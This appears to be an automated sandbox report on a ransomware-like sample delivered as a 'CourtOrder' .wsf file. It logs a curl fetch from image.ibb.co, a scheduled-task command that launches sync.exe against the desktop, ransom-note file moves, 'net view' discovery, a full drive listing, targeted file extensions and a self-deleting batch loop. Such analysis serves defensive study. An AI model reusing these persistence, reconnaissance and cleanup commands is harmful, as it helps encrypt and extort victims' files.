Aug 23, 2017 11:21:33.851583004 MESZ	443	49195	104.27.127.62	192.168.1.16	CN=ssl380953.cloudflaressl.com, OU=PositiveSSL Multi-Domain, OU=Domain Control Validated	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Aug 22 11:21:33 CEST 2017	Wed Aug 22 11:21:33 CEST 2018	[[ Version: V3 Subject: CN=ssl380953.cloudflaressl.com, OU=PositiveSSL Multi-Domain, OU=Domain Control Validated Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 137913005347923907015781153321285228554267301360746517259720107755576703884815237871314046606573393178170134616137227195458523442611718805046944696880780549121777971101714608108602759080940951050955545984415739285539854846967815006582291670851525594644162395072093554477606387616910885183924352887518783102443 public exponent: 3 Validity: [From: Tue Aug 22 11:21:33 CEST 2017, To: Wed Aug 22 11:21:33 CEST 2018] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6efc9010 eb82432e c6b836fa 9920c838]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: ssl380953.cloudflaressl.com DNSName: .chapmanandassociates.ca DNSName: .daniellesdoggydaycare.com DNSName: .digitaldynamicswsi.com DNSName: .grassrootsconstruction.org DNSName: .ibb.co DNSName: .karenlintoncrum.com DNSName: .prlog.ru DNSName: .quemfornece.com DNSName: .rightawaycleaning.net DNSName: .simgbb.com DNSName: .southwestpropertygold.com DNSName: .swanheating.com DNSName: .swanhomecomfort.com DNSName: .topuai.com DNSName: .williswelby.com DNSName: .wsiconcepts.com DNSName: .wsiworld.com DNSName: chapmanandassociates.ca DNSName: daniellesdoggydaycare.com DNSName: digitaldynamicswsi.com DNSName: grassrootsconstruction.org DNSName: ibb.co DNSName: karenlintoncrum.com DNSName: prlog.ru DNSName: quemfornece.com DNSName: rightawaycleaning.net DNSName: simgbb.com DNSName: southwestpropertygold.com DNSName: swanheating.com DNSName: swanhomecomfort.com DNSName: topuai.com DNSName: williswelby.com DNSName: wsiconcepts.com DNSName: wsiworld.com][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 53 48 B8 7B 78 E7 ED DE 16 3D 22 C0 D1 5B A2 09 SH..x....="..[..0010: 4A 72 3D 6D Jr=m]]] Algorithm: [SHA1withRSA] Signature:0000: 8C 9A D2 27 8C E8 A0 03 DF 0A 9A F5 13 CE 69 BE ...'..........i.0010: 2B 14 F6 A1 C5 8C 70 13 9E 4F F0 21 C2 FD FA 33 +.....p..O.!...30020: 70 D8 B6 70 78 88 5B EE F3 15 BC 48 B3 24 C4 2E p..px.[....H.$..0030: DD 67 AB DC 88 DA 8D 13 2F 03 8C 63 8C C4 CF 13 .g....../..c....0040: D2 9B CD C4 2A BE 80 92 9E A4 76 AE 87 50 D3 B3 .........v..P..0050: A0 79 30 4E 5A 16 A9 25 5C D8 70 1F 4D B1 14 A4 .y0NZ..%\.p.M...0060: 79 EA 6B 33 F7 4D D3 5E 70 B1 AA 46 78 68 43 F7 y.k3.M.^p..FxhC.0070: 73 64 13 0A 5C 69 01 12 84 43 8A BD F2 2E AA F4 sd..\i...C......0080: AE 71 9C FC 4F DE A4 4E FE 36 E6 70 AE EE F2 C9 .q..O..N.6.p....0090: 32 96 29 AD 7F 60 BE 1B 2B 73 BE 14 AE 37 3A AC 2.)..`..+s...7:.00A0: 75 C4 4C 65 EC 96 34 AA 6D D6 42 0D 31 89 76 50 u.Le..4.m.B.1.vP00B0: 7D 04 92 65 DB A1 2B 44 F8 2F 4A 08 06 98 AB A7 ...e..+D./J.....00C0: E0 43 B4 37 AA F9 F1 7A E5 86 13 34 D4 6E 74 DC .C.7...z...4.nt.00D0: F5 20 77 B1 88 37 C4 3C AA 68 D8 F7 1C 40 E3 D9 . w..7.<.h...@..00E0: 1C 47 43 6A A9 8E 09 0D 65 3B 7E 64 4E 63 D3 D9 .GCj....e;.dNc..00F0: 5D 47 A0 5E 88 54 F0 FE D6 22 EF B4 1B 5D D0 08 ]G.^.T..."...]..0100: 31 CD 56 91 29 FA 1B C5 3F 3B B7 39 D3 06 94 36 1.V.)...?;.9...60110: EF A0 47 D7 1D AB 3A 2D F2 C0 E4 0A 14 13 D6 2B ..G...:-.......+0120: 5A 26 76 9F 44 6E A4 28 B0 F9 60 47 93 0B 13 D5 Z&v.Dn.(..`G....0130: E9 5C 47 8C B5 A0 24 79 97 BD 43 DF EE 03 9B 7F .\G...$y..C.....0140: C1 62 91 23 24 09 70 A8 AF 02 8F D9 90 FE C3 B0 .b.#$.p.........0150: 49 1B FE EF 4B 69 39 DE FE EA 5E D3 AD 8F 42 28 I...Ki9...^...B(0160: 92 67 55 7F ED 5F 45 99 58 CE E6 3D A4 67 F8 89 .gU.._E.X..=.g..0170: 52 3D E3 DF 7E 5C 89 9B EB AE 35 19 64 08 0C 0B R=...\....5.d...0180: AF 3B 0D 2B 5E 27 08 51 26 B1 14 CC AB D5 8B 29 .;.+^'.Q&......)0190: 8A 87 69 1B 8B 5E C8 72 DB 72 90 DB 58 C4 6F 4E ..i..^.r.r..X.oN01A0: 09 1E 26 4B F1 1D C4 3C 2D FF C8 E9 39 28 59 BB ..&K...<-...9(Y.01B0: C0 CE 48 FE A4 2E C9 3A BF 1B 98 00 BF AA 83 0A ..H....:........01C0: 98 36 EA A5 2A 28 A3 7C 1C 7A 06 04 A8 BF 07 80 .6..*(...z......01D0: 3F E8 0D 0D A4 94 EC 12 4C 12 F5 FB 2F B6 CC 3E ?.......L.../..>01E0: E1 54 DB 42 D1 FE 09 2E 77 FD 70 30 96 22 C9 A2 .T.B....w.p0."..01F0: 9C 41 BB 9C 5E 94 48 41 E2 BB 49 5A E6 8A 9A AE .A..^.HA..IZ....]
Aug 23, 2017 11:21:33.851583004 MESZ	443	49195	104.27.127.62	192.168.1.16	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]

HTTPS Proxied Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header / Data	Total Bytes Transfered (KB)
2017-08-23 09:21:34 UTC	49195	443	192.168.1.16	104.27.127.62	GET /mxRqXF/arrival.jpg HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: curl/7.51.0 Host: image.ibb.co	0
2017-08-23 09:21:34 UTC	443	49195	104.27.127.62	192.168.1.16	HTTP/1.1 403 Forbidden Date: Wed, 23 Aug 2017 09:21:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=d9d3303d3a92b74735437e2f5ae50f7381503480094; expires=Thu, 23-Aug-18 09:21:34 GMT; path=/; domain=.ibb.co; HttpOnly Cache-Control: max-age=2 Expires: Wed, 23 Aug 2017 09:21:36 GMT X-Frame-Options: SAMEORIGIN Server: cloudflare-nginx CF-RAY: 392d009da9ac2920-OTP	0
2017-08-23 09:21:34 UTC	443	49195	104.27.127.62	192.168.1.16	Data Raw: 31 35 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1598<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if	0
2017-08-23 09:21:34 UTC	443	49195	104.27.127.62	192.168.1.16	Data Raw: 72 6f 6a 65 63 74 69 6f 6e 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 39 5d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 64 6e 2d Data Ascii: rojection" /><![endif]--><style type="text/css">body{margin:0;padding:0}</style>...[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script><![endif]-->...[if gte IE 10]>...><script type="text/javascript" src="/cdn-	1
2017-08-23 09:21:34 UTC	443	49195	104.27.127.62	192.168.1.16	Data Raw: 20 64 61 74 61 2d 74 79 70 65 3d 22 6e 6f 72 6d 61 6c 22 20 20 64 61 74 61 2d 72 61 79 3d 22 33 39 32 64 30 30 39 64 61 39 61 63 32 39 32 30 22 20 61 73 79 6e 63 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 42 69 78 59 55 41 41 41 41 41 42 68 64 48 79 6e 46 55 49 4d 41 5f 73 61 34 73 2d 58 73 4a 76 6e 6a 74 67 42 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 3e 3c 2f 64 69 76 3e 0a 20 20 3c 6e 6f 73 63 72 69 70 74 20 69 64 3d 22 63 66 2d 63 61 70 74 63 68 61 2d 62 6f 6f 6b 6d 61 72 6b 22 20 63 6c 61 73 73 3d 22 63 66 2d 63 61 70 74 63 68 61 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 3c 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 33 30 32 70 78 22 3e 0a 20 20 Data Ascii: data-type="normal" data-ray="392d009da9ac2920" async data-sitekey="6LfBixYUAAAAABhdHynFUIMA_sa4s-XsJvnjtgB0"></script> <div class="g-recaptcha"></div> <noscript id="cf-captcha-bookmark" class="cf-captcha-info"> <div><div style="width: 302px">	1
2017-08-23 09:21:34 UTC	443	49195	104.27.127.62	192.168.1.16	Data Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 64 6f 20 49 20 68 61 76 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 61 20 43 41 50 54 43 48 41 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 64 65 74 61 69 6c 22 3e 43 6f Data Ascii: -section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="why_captcha_headline">Why do I have to complete a CAPTCHA?</h2> <p data-translate="why_captcha_detail">Co	1
2017-08-23 09:21:34 UTC	443	49195	104.27.127.62	192.168.1.16	Data Raw: 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 22 3e 3c 73 70 61 6e 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 70 65 72 66 6f 72 6d 61 6e 63 65 5f 73 65 63 75 72 69 74 79 5f 62 79 22 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 64 61 74 61 2d 6f 72 69 67 2d 70 72 6f 74 6f 3d 22 68 74 74 70 73 22 20 64 61 74 61 2d 6f 72 69 67 2d 72 65 66 3d 22 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 65 72 72 6f 72 5f 66 6f 6f 74 65 72 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 Data Ascii: l;</span> <span class="cf-footer-item"><span data-translate="performance_security_by">Performance & security by</span> <a data-orig-proto="https" data-orig-ref="www.cloudflare.com/5xx-error-landing?utm_source=error_footer" id="brand_link" target="	0
2017-08-23 09:21:34 UTC	443	49195	104.27.127.62	192.168.1.16	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0	0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 3112 Parent PID: 2740

General

Start time:	11:21:57
Start date:	23/08/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\CourtOrder_845493809.wsf'
Imagebase:	0x77a20000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 3292 Parent PID: 3112

General

Start time:	11:22:08
Start date:	23/08/2017
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00
Imagebase:	0x778a0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: sync.exe PID: 3356 Parent PID: 3324

General

Start time:	11:24:00
Start date:	23/08/2017
Path:	C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e 'C:\Users\user\desktop'
Imagebase:	0x778a0000
File size:	2203648 bytes
MD5 hash:	E80C5368FA4395655BE9A4ED9A6CFCC3
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3412 Parent PID: 3356

General

Start time:	11:24:05
Start date:	23/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html'
Imagebase:	0x75860000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3436 Parent PID: 3356

General

Start time:	11:24:07
Start date:	23/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png'
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3460 Parent PID: 3356

General

Start time:	11:24:09
Start date:	23/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c cmd /c net view
Imagebase:	0x75860000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3512 Parent PID: 3460

General

Start time:	11:24:10
Start date:	23/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c net view
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: net.exe PID: 3588 Parent PID: 3512

General

Start time:	11:24:16
Start date:	23/08/2017
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view
Imagebase:	0x778a0000
File size:	46080 bytes
MD5 hash:	B9A4DAC2192FD78CDA097BFA79F6E7B2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3624 Parent PID: 3356

General

Start time:	11:24:29
Start date:	23/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP
Imagebase:	0x75860000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: sync.exe PID: 3356 Parent PID: 3324

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	87.2%
Total number of Nodes:	1018
Total number of Limit Nodes:	3

Executed Functions

Function 00401630, Relevance: 792.0, APIs: 40, Strings: 411, Instructions: 2747

APIs

Part of subcall function 00551D50: strlen.MSVCRT ref: 00551D5E

CreateDirectoryA.KERNELBASE(00000000,00000001,?,?,?,0CA30061,00000001,?,005715BA,?,00000000), ref: 004016A3
Sleep.KERNELBASE(00000000,00000000,?,005715BA,?,00000000), ref: 004016B2

Part of subcall function 0056E030: strlen.MSVCRT ref: 0056E045

system.MSVCRT ref: 00401745
system.MSVCRT ref: 00401765
GetLogicalDriveStringsA.KERNEL32(00000000,00000000), ref: 00401782

Part of subcall function 00404A24: Sleep.KERNELBASE(005715BA), ref: 00404A35
Part of subcall function 00404A24: time.MSVCRT ref: 00404A43
Part of subcall function 00404A24: srand.MSVCRT ref: 00404A4B
Part of subcall function 00404A24: rand.MSVCRT ref: 00404A62

GetDriveTypeA.KERNELBASE ref: 004017B5

Part of subcall function 00570390: malloc.MSVCRT ref: 005703A5
Part of subcall function 00570390: malloc.MSVCRT ref: 00570406

lstrlenA.KERNEL32(00000000,?,?,?), ref: 004018F4

Part of subcall function 00404972: _popen.MSVCRT ref: 0040499B
Part of subcall function 00404972: feof.MSVCRT ref: 004049D7
Part of subcall function 00404972: fgets.MSVCRT ref: 004049F5

Part of subcall function 0056AE60: memchr.MSVCRT ref: 0056AFCB

Part of subcall function 004F3DD0: strlen.MSVCRT ref: 004F3DDE

ShellExecuteExA.SHELL32 ref: 00401DFC
WaitForSingleObject.KERNEL32 ref: 00401E14
GetSystemWindowsDirectoryA.KERNEL32(?), ref: 00401E38
tolower.MSVCRT ref: 00401E90
tolower.MSVCRT ref: 00403C63

Part of subcall function 004048E5: memcmp.MSVCRT ref: 0040490B

remove.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00403D4B
time.MSVCRT ref: 00403DB5
srand.MSVCRT ref: 00403DDC
rand.MSVCRT ref: 00403DE1

Part of subcall function 004053C0: strlen.MSVCRT ref: 00405407

malloc.MSVCRT ref: 00403F67
fopen.MSVCRT ref: 00403FCD
fwrite.MSVCRT ref: 00403FF1
fclose.MSVCRT ref: 00403FFF

Part of subcall function 0056D960: strlen.MSVCRT ref: 0056D974

system.MSVCRT ref: 004044C7

Part of subcall function 004F4630: strlen.MSVCRT ref: 004F4643
Part of subcall function 004F4630: memcmp.MSVCRT ref: 004F4662

fopen.MSVCRT ref: 00404136
fopen.MSVCRT ref: 0040417C
malloc.MSVCRT ref: 004041BE
malloc.MSVCRT ref: 0040420E
fwrite.MSVCRT ref: 00404232
fread.MSVCRT ref: 0040425C
fwrite.MSVCRT ref: 004042BB
fwrite.MSVCRT ref: 0040431C
free.MSVCRT(00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00404324
free.MSVCRT(00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00404332
fclose.MSVCRT ref: 00404346
fclose.MSVCRT ref: 00404354
remove.MSVCRT(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00404398
_chmod.MSVCRT ref: 004043B0
remove.MSVCRT(?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 004043C0
remove.MSVCRT(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004043D0
remove.MSVCRT(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
system.MSVCRT ref: 004044A7
system.MSVCRT ref: 0040456B

Part of subcall function 004F3C90: strlen.MSVCRT ref: 004F3C9E

Part of subcall function 004F4240: strlen.MSVCRT ref: 004F424E

Strings

ldf, xrefs: 00402587
prf, xrefs: 004029D5
nxl, xrefs: 004033B4
program files\, xrefs: 00401EF4
mlb, xrefs: 0040261F
msg, xrefs: 0040332F
sql, xrefs: 00402B2B
crw, xrefs: 0040221D
qbb, xrefs: 00403556
readme.png" && exit, xrefs: 0040446E
wma, xrefs: 00403A75
des, xrefs: 004030BC
obj, xrefs: 004033DA
start tmp.bat, xrefs: 00404555
mdf, xrefs: 00403284
std, xrefs: 00402B8A
asp, xrefs: 00401FF6
odt, xrefs: 00402788
dcr, xrefs: 0040227C
oab, xrefs: 004026DD
:Repeatdel "sync.exe"if exist "sync.exe" goto Repeatexit, xrefs: 00404538
mapimail, xrefs: 004025C0
lzh, xrefs: 00403212
